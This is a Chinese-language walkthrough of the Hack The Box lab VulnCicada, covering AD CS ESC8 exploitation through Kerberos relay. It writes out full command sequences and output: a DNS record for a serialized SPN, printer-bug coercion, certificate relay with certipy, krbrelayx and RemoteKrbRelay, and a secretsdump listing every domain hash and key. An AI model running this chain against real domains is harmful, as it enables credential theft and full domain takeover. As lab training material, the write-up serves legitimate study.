-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8-7).crt
-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8-9).crt
-rw-rw-rw- 924 Thu Apr 10 04:42:44 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9).crt
-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9-10).crt
-rw-rw-rw- 1390 Thu Apr 10 04:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9-8).crt
-rw-rw-rw- 885 Fri Sep 13 06:50:51 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA.crt
-rw-rw-rw- 331 Fri Sep 13 11:17:59 2024 nsrev_cicada-DC-JPQ225-CA.asp
#
大部分是 .crl(证书吊销列表)和 .crt(证书)文件,通常都没有包含什么敏感信息,但是能说明此机器应该是安装了ADCS
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# cat nsrev_cicada-DC-JPQ225-CA.asp
<%
Response.ContentType = "application/x-netscape-revocation"
serialnumber = Request.QueryString
set Admin = Server.CreateObject("CertificateAuthority.Admin")
stat = Admin.IsValidCertificate("DC-JPQ225.cicada.vl\cicada-DC-JPQ225-CA", serialnumber)
if stat = 3 then Response.Write("0") else Response.Write("1") end if
%>
一个标准的证书吊销查询脚本,里面没有敏感信息
1.4. ESC8
使用certipy枚举一下
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy find -k -no-pass -dc-ip 10.129.200.125 -dc-host DC-JPQ225.cicada.vl -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] Target name (-target) not specified and Kerberos authentication is used. This might fail
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'cicada-DC-JPQ225-CA'
[*] Checking web enrollment for CA 'cicada-DC-JPQ225-CA' @ 'DC-JPQ225.cicada.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : cicada-DC-JPQ225-CA
DNS Name : DC-JPQ225.cicada.vl
Certificate Subject : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
Certificate Serial Number : 203386B0B32C3A8649221A3C34E273A3
Certificate Validity Start : 2026-01-15 12:30:17+00:00
Certificate Validity End : 2526-01-15 12:40:17+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : CICADA.VL\Administrators
Access Rights
ManageCa : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
ManageCertificates : CICADA.VL\Administrators
CICADA.VL\Domain Admins
CICADA.VL\Enterprise Admins
Enroll : CICADA.VL\Authenticated Users
>>>> [!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates : [!] Could not find any certificate templates
目标存在ESC8模板漏洞
参考: https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc8-ntlm-relay-to-ad-cs-web-enrollment 进行利用
根据 @ly4k 在wiki中提到的信息得知要利用此漏洞需要满足下面的条件:
1.ADCS WEB服务需要满足以下条件:
- 允许NTLM身份认证: 托管证书认证的web服务器支持NTLM身份认证(默认允许)
- 未强制开启NTLM Relay中继保护:如扩展身份验证保护 (EPA) 也叫通道绑定
2.利用步骤:
- 强制身份验证: 强制特权帐户使用 NTLM 对被控制的机器进行身份验证(常用域控制器计算机帐户进行强制认证)
- 设置 NTLM 中继: 使用 NTLM 中继工具(例如 Certipy 的
relay命令),监听传入的 NTLM 身份验证。 - 中继身份验证: Certipy 捕获此传入的 NTLM 身份验证,并转发(中继)到 AD CS 的HTTP Web 注册端点(例如,
https://<ca_server>/certsrv/certfnsh.asp) - 模拟并请求证书: AD CS Web 服务从中继的特权帐户接收 NTLM 身份验证后,会以该特权帐户的身份处理来自Certipy 的后续注册请求。然后使用Certipy 请求证书
- 使用证书进行特权访问: CA颁发证书,Certipy 作为中介机构接收此证书。然后使用此证书和
certipy auth通过 Kerberos PKINIT 冒充特权帐户进行身份验证
首先我们先看ADCS的web是否满足,检测发现目标尚未开启通道绑定,且未强制执行 LDAP 签名
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc ldap 10.129.200.138 -u rosie.powell -p Cicada123 -k
LDAP 10.129.200.138 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:cicada.vl) (signing:None) (channel binding:Never) (NTLM:False)
LDAP 10.129.200.138 389 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
下面会根据0xdf和xct的wp,展示两种不同的攻击方式,一种在linux上进行,一种在windows上进行
1.4.1. ESC8 on Linux
Linux上的利用方式原理来自于 https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx.html
因为kdc 与 adcs web都位于同一台机器上,所以没法进行ntlm中继(因为NTLM的自中继保护) 所以只能使用kerberos中继,添加这个SPN序列化的DNS记录就是为了把NTLM中继升级为kerberos中继
1.4.1.1. 添加序列化SPN的DNS记录
首先需要为机器添加一条添加伪造的恶意 SPN 记录,指向攻击者 IP
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added这串长字符实际上是一个序列化的服务主体名称(Serialized SPN)。当 DC 尝试连接这个“名字”时,它在解析过程中会被诱导认为:“这是一个必须使用 Kerberos 协议进行身份验证的目标”。于是,DC 会主动向 KDC(自己)申请一张 Kerberos 票据(TGS)给攻击者,而不是发送 NTLM 请求。 从而完成NTLM中继--》kerberos中继
1.4.1.2. kerberos relay via certipy
然后使用certipy 进行reply 目标是服务器的ADCS web
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
/root/.local/share/uv/tools/certipy-ad/lib/python3.13/site-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] CICADA.VL\rosie.powell from ccache
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, DFSCoerce
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, MSEven
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] CICADA.VL\rosie.powell from ccache
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
然后在中继端,我们可以收到来自域控的链接并将其中继到域控,然后能收到DC办颁发的一个.pfx证书文件
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
/root/.local/share/uv/tools/certipy-ad/lib/python3.13/site-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] SMBD-Thread-2 (process_request_thread): Received connection from 10.129.200.138, attacking target http://dc-jpq225.cicada.vl
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Authenticating against http://dc-jpq225.cicada.vl as / SUCCEED
[*] Requesting certificate for '\\' based on the template 'DomainController'
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.129.200.138, attacking target http://dc-jpq225.cicada.vl
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: POST http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[*] Certificate issued with request ID 88
[*] Retrieving certificate for request ID: 88
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certnew.cer?ReqID=88 "HTTP/1.1 200 OK"
[*] Got certificate with DNS Host Name 'DC-JPQ225.cicada.vl'
[*] Certificate object SID is 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Saving certificate and private key to 'dc-jpq225.pfx'
>>>> [*] Wrote certificate and private key to 'dc-jpq225.pfx'
[*] Exiting...
然后申请域控机器的tgt
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.200.138
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# impacket-secretsdump -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
cicada.vl\Shirley.West:1104:aad3b435b51404eeaad3b435b51404ee:ff99630bed1e3bfd90e6a193d603113f:::
cicada.vl\Jordan.Francis:1105:aad3b435b51404eeaad3b435b51404ee:f5caf661b715c4e1435dfae92c2a65e3:::
cicada.vl\Jane.Carter:1106:aad3b435b51404eeaad3b435b51404ee:7e133f348892d577014787cbc0206aba:::
cicada.vl\Joyce.Andrews:1107:aad3b435b51404eeaad3b435b51404ee:584c796cd820a48be7d8498bc56b4237:::
cicada.vl\Daniel.Marshall:1108:aad3b435b51404eeaad3b435b51404ee:8cdf5eeb0d101559fa4bf00923cdef81:::
cicada.vl\Rosie.Powell:1109:aad3b435b51404eeaad3b435b51404ee:ff99630bed1e3bfd90e6a193d603113f:::
cicada.vl\Megan.Simpson:1110:aad3b435b51404eeaad3b435b51404ee:6e63f30a8852d044debf94d73877076a:::
cicada.vl\Katie.Ward:1111:aad3b435b51404eeaad3b435b51404ee:42f8890ec1d9b9c76a187eada81adf1e:::
cicada.vl\Richard.Gibbons:1112:aad3b435b51404eeaad3b435b51404ee:d278a9baf249d01b9437f0374bf2e32e:::
cicada.vl\Debra.Wright:1113:aad3b435b51404eeaad3b435b51404ee:d9a2147edbface1666532c9b3acafaf3:::
DC-JPQ225$:1000:aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f9181ec2240a0d172816f3b5a185b6e3e0ba773eae2c93a581d9415347153e1a
Administrator:aes128-cts-hmac-sha1-96:926e5da4d5cd0be6e1cea21769bb35a4
Administrator:des-cbc-md5:fd2a29621f3e7604
krbtgt:aes256-cts-hmac-sha1-96:ed5b82d607535668e59aa8deb651be5abb9f1da0d31fa81fd24f9890ac84693d
krbtgt:aes128-cts-hmac-sha1-96:9b7825f024f21e22e198e4aed70ff8ea
krbtgt:des-cbc-md5:2a768a9e2c983e31
cicada.vl\Shirley.West:aes256-cts-hmac-sha1-96:3f3657fb6f0d441680e9c5e0c104ef4005fa5e79b01bbeed47031b04a913f353
cicada.vl\Shirley.West:aes128-cts-hmac-sha1-96:cd16a8664de29a4e8bd9e8b492f3eef9
cicada.vl\Shirley.West:des-cbc-md5:abbf341664bafe76
cicada.vl\Jordan.Francis:aes256-cts-hmac-sha1-96:ec8aaa2c9432ed3b0d2834e4e24dc243ec8d77ec3488101e79d1b2cc1c2ee6ea
cicada.vl\Jordan.Francis:aes128-cts-hmac-sha1-96:0b551142246edc108a92913e46852404
cicada.vl\Jordan.Francis:des-cbc-md5:a2e53d6ea44ab6e9
cicada.vl\Jane.Carter:aes256-cts-hmac-sha1-96:bb04095d1884439b825a5606dd43aadfd2a8fad1386b3728b9bad582efd5d4aa
cicada.vl\Jane.Carter:aes128-cts-hmac-sha1-96:8a27618e7036a49fb6e371f2e7af649e
cicada.vl\Jane.Carter:des-cbc-md5:340eda8962cbadce
cicada.vl\Joyce.Andrews:aes256-cts-hmac-sha1-96:7ca8317638d429301dfbb88af701fadffbc106d31f79a4de7e8d35afbc2d30c4
cicada.vl\Joyce.Andrews:aes128-cts-hmac-sha1-96:6ec2495dea28c09cf636dd8b080012fd
cicada.vl\Joyce.Andrews:des-cbc-md5:6bf2b6f21fcda258
cicada.vl\Daniel.Marshall:aes256-cts-hmac-sha1-96:fcccb590bac0a888898461247fbb3ee28d282671d8491e0b0b83ac688c2a29d6
cicada.vl\Daniel.Marshall:aes128-cts-hmac-sha1-96:80a3b053500586eefd07d32fc03e3849
cicada.vl\Daniel.Marshall:des-cbc-md5:e0fbdcb3c7e9f154
cicada.vl\Rosie.Powell:aes256-cts-hmac-sha1-96:54de41137f8d37d4a6beac1638134dfefa73979041cae3ffc150ebcae470fce5
cicada.vl\Rosie.Powell:aes128-cts-hmac-sha1-96:d01b3b63a2cde0d1c5e9e0e4a55529a4
cicada.vl\Rosie.Powell:des-cbc-md5:6e70b9a41a677a94
cicada.vl\Megan.Simpson:aes256-cts-hmac-sha1-96:cdb94aaf5b15465371cbe42913d652fa7e2a2e43afc8dd8a17fee1d3f142da3b
cicada.vl\Megan.Simpson:aes128-cts-hmac-sha1-96:8fd3f86397ee83ed140a52bdfa321df0
cicada.vl\Megan.Simpson:des-cbc-md5:587032806b5d19b6
cicada.vl\Katie.Ward:aes256-cts-hmac-sha1-96:829effafe88a0a5e17c4ccf1840f277327309b2902aeccc36625ac51b8e936bc
cicada.vl\Katie.Ward:aes128-cts-hmac-sha1-96:585264bc071354147db5b677be13506b
cicada.vl\Katie.Ward:des-cbc-md5:01801aa2e5755898
cicada.vl\Richard.Gibbons:aes256-cts-hmac-sha1-96:3c3beb85ec35003399e37ae578b90ae7a65b4ec7305e0ac012dbeaaa41bcbe22
cicada.vl\Richard.Gibbons:aes128-cts-hmac-sha1-96:646557f4143182bda5618f95429f3a49
cicada.vl\Richard.Gibbons:des-cbc-md5:834a675bd058efd0
cicada.vl\Debra.Wright:aes256-cts-hmac-sha1-96:26409e8cc8f3240501db7319bd8d8a2077d6b955a8f673b9ccf7d9086d3aec62
cicada.vl\Debra.Wright:aes128-cts-hmac-sha1-96:6a289ddd9a1a2196b671b4bbff975629
cicada.vl\Debra.Wright:des-cbc-md5:f25eb6a4265413cb
DC-JPQ225$:aes256-cts-hmac-sha1-96:01e2f9943c6c0c3f010dde6dddcae89cc81158e4f1c017e6fc34f85538d892b1
DC-JPQ225$:aes128-cts-hmac-sha1-96:87efc91730d07d819f58b4996e3fa04c
DC-JPQ225$:des-cbc-md5:6df208855d40dfcb
[*] Cleaning up...
这里evil-winrm有问题,我一操作就会掉线
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# evil-winrm -i DC-JPQ225.cicada.vl -u administrator -H 85a0da53871a9d56b6cd05deda3a5e87
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\>
Error: An error of type ArgumentError happened, message is unknown type: 2061232681
Error: Exiting with code 1
换成wmiexec
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# impacket-wmiexec -k DC-JPQ225.cicada.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
cicada\administrator
1.4.1.3. kerberos relaly via krbrelayX
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 92
[*] Writing PKCS#12 certificate to ./unknown5898$.pfx
[*] Certificate successfully written to file
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
可能会爆下面的错误:
可能会报错:
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 90
Exception in thread Thread-5:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1041, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
修改Impacket的generate_pfx.py如下即可解决
def generate_pfx(self, key, certificate):
certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
p12 = crypto.PKCS12()
p12.set_certificate(certificate)
p12.set_privatekey(key)
return p12.export()
#=========改成下面的即可=================
def generate_pfx(self, key, certificate):
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.serialization import pkcs12
# 将证书从 PEM 转换为 cryptography 对象
cert_pem = certificate.encode() if isinstance(certificate, str) else certificate
cert_obj = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)
cryptography_cert = cert_obj.to_cryptography()
# 将 OpenSSL 的私钥转换为 cryptography 对象
key_pem = crypto.dump_privatekey(crypto.FILETYPE_PEM, key)
cryptography_key = serialization.load_pem_private_key(key_pem, password=None)
# 生成 PKCS12 数据
p12_data = pkcs12.serialize_key_and_certificates(
name=b"",
key=cryptography_key,
cert=cryptography_cert,
cas=None,
encryption_algorithm=serialization.NoEncryption()
)
return p12_data
1.4.2. ECS8 on Windows
ESC8 与 Kerberos 自中继绕过
1. NTLM 自中继防护 (Self-Relay Mitigation)
在典型的 ESC8 攻击中,若 域控 (DC) 与 证书注册 Web 服务 (AD CS Web Enrollment) 运行在同一台机器上,攻击流程会触发“自中继”:
- 诱导机器 A(DC)向攻击者发起认证。
- 攻击者将凭据转发回机器 A 自身的 Web 接口。
由于微软针对 NTLM 协议引入了自中继防护机制(如 MS08-068),系统会识别并拦截这种同机认证环路,导致中继失败。
2. 解决方案:Kerberos Relay (ESC8 进阶)
近期研究显示,通过 Kerberos 协议 进行中继可以绕过针对 NTLM 的自中继限制。
- 工具: RemoteKrbRelay (由 Cicada8 Research 开发)。它能够中继 Kerberos 认证(如通过 RPCSS)到 Web 接口。
- 前提条件: 该工具需在 Windows 环境下运行,并要求拥有一个合法的域机器/用户上下文。
3. 利用策略:
由于域环境通常允许普通用户将机器加入域(MachineAccountQuota 默认为 10),攻击者可以:
- 使用获取到的域用户凭据(如
rosie.powell),将自己的 Windows 虚拟机加入目标域。 - 在该虚拟机上登录域账号,运行 RemoteKrbRelay
- 诱导 DC 发起认证,通过Kerberos relay 获取 DC 的证书(.pfx/PKCS12),从而实现权限提升。
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc ldap DC-JPQ225.cicada.vl -k --use-kcache -M maq
LDAP DC-JPQ225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:CICADA.VL) (signing:None) (channel binding:Never) (NTLM:False)
LDAP DC-JPQ225.cicada.vl 389 DC-JPQ225 [+] CICADA.VL\rosie.powell from ccache
MAQ DC-JPQ225.cicada.vl 389 DC-JPQ225 [*] Getting the MachineAccountQuota
MAQ DC-JPQ225.cicada.vl 389 DC-JPQ225 MachineAccountQuota: 10
由于域内的计算机配额有10个,所以我们可以将自己的windows虚拟机加入到域中
1.4.2.1. 将本地windows虚拟机加入域中
把dns配置为域控
然后重命名电脑,加入域
然后输入账号密码
重启后先登录本地管理员把vpn连上,然后点这个
切换用户,切换到rosie.powell上
1.4.2.2. Kerberos Relay via RemoteKrbRelay
然后使用RemoteKrbRelay执行命令
RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
/\_/\____,
,___/\_/\ \ ~ /
\ ~ \ ) XXX
XXX / /\_/\___,
\o-o/-o-o/ ~ /
) / \ XXX
_| / \ \_/
,-/ _ \_/ \
/ ( /____,__| )
( |_ ( ) \) _|
_/ _) \ \__/ (_
(,-(,(,(,/ \,),),)
CICADA8 Research Team
From Michael Zhmaylo (MzHmO)
[+] Setting UP Rogue COM at port 12345
[+] Registering...
[+] Register success
[+] Forcing Authentication
[+] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 6082071f06092a864886f71201020201006e82070e3082070aa003020105a10302010ea20703050020000000a3820546618205423082053ea003020105a10b1b094349434144412e564ca2263024a003020102a11d301b1b04687474701b1364632d6a70713232352e6369636164612e766ca3820500308204fca003020112a103020105a28204ee048204ea56acc6e09b7c959cc8edcec89121dc9c9105c7d9810223a3c16c9697c1b5da459300e5123906b0694be768bc2454ca1cf5faf529e28764193e18a2a987c863402f1d617f07891d583f3bbe9674119677a4c08160f964a02fd7fc5f9acde246cc610878bc6c6346bfde4d8da99f3ddc65fccf59008272c9d5dd4c9959f9e4b3093868e0bfeea7e6d9003a0da394250d7209272a0b6ec56ad77625f7d6de746422b29055869640dd360045d9f6b995068b8c638cea666d007127359626191021b665426e4080cb8470e05890750d8cf7aa3f4259d0dfaa505c9f6fa8604ec56fd465939f008a5dece81155c01dc601c998c149c6560e42d5635cdce5ea0fb7a32fe0c2e4260bc98871a660c333adf7cdc19e44da13f29797febfc78bb738cb3befb1de3dd8cba4c1ebaf0fa659471754695295b4778a006cafe50926cc96b1c84173608998ee055f848d27f8312e35f0b7b797f8134ef84a6d22b593557c761ddef4d18316842a7162a99ae37ae808a9493caaed6edf1c46d0d75312fd6a744aa5c9ec2f6aadd0b3b859d0facdff07015d40d834daa88969d4def4788678438a0c639b4710c2cca5fe288efbb38a5a45b23cc41caff13a4bf9d99a9e137d6c30dc1616912133b6e577ba12d6e348da5471e8c143057b6ac30bfceb4ca07d6abcdbb5e232eeb443c41f63f96c0a901792c5c71728ad8c26ed2415b442cd96be537eb0222b7f7e5a